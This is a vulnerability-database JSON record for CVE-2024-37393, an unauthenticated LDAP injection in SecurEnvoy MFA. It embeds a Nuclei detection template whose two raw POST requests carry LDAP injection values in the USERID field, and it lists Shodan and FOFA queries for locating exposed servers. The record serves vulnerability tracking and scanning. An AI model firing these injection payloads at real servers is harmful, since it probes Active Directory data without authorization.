{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-37393/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-37393/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-37393/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-37393/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-37393/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-37393"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-37393"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.03304,
      "kev": false,
      "percentile": 0.88045
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-37393.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2024-37393\ninfo:\n  name: SecurEnvoy Two Factor Authentication - LDAP Injection\n  author: s4e-io\n  severity: critical\n  description: |\n    Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n  impact: |\n    Unauthenticated attackers can exploit LDAP injection to exfiltrate sensitive Active Directory data including cleartext LAPS passwords.\n  remediation: |\n    Update SecurEnvoy MFA to version 9.4.514 or later.\n  reference:\n    - https://www.tenable.com/cve/CVE-2024-37393\n    - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393\n    - https://securenvoy.com\n  classification:\n    cve-id: CVE-2024-37393\n    cwe-id: CWE-89\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    epss-score: 0.03304\n    epss-percentile: 0.88045\n    cpe: cpe:2.3:a:securenvoy:multi-factor_authentication_solutions:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    shodan-query: title:\"SecurEnvoy\"\n    fofa-query: title=\"SecurEnvoy\"\n  tags: cve,cve2024,securenvoy,ldap,vuln,vkev\n\nvariables:\n  userid: \"{{to_lower(rand_base(20))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /secserver/? HTTP/1.1\n        Host: {{Hostname}}\n\n        FLAG=DESKTOP\n        1\n        STATUS:INIT\n        USERID:{{userid}})(sAMAccountName=*\n        MEMBEROF:Domain Users\n\n      - |\n        POST /secserver/? HTTP/1.1\n        Host: {{Hostname}}\n\n        FLAG=DESKTOP\n        1\n        STATUS:INIT\n        USERID:*)(sAMAccountName=*\n        MEMBEROF:Domain Users\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(body_1, 'Error checking Group')\"\n          - \"status_code_1 == 200\"\n          - \"contains(body_2, 'GETPASSCODE')\"\n          - \"status_code_2 == 200\"\n        condition: and\n# digest: 4a0a0047304502205d95c2d00cc4d3282bbeef3780e80be315210494293882a1bc34731a7de7674f022100b9f80bb13fde2b111d7fe98087cdbea867e03bae94d6745e6524eb254e5f408e:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-37393"
}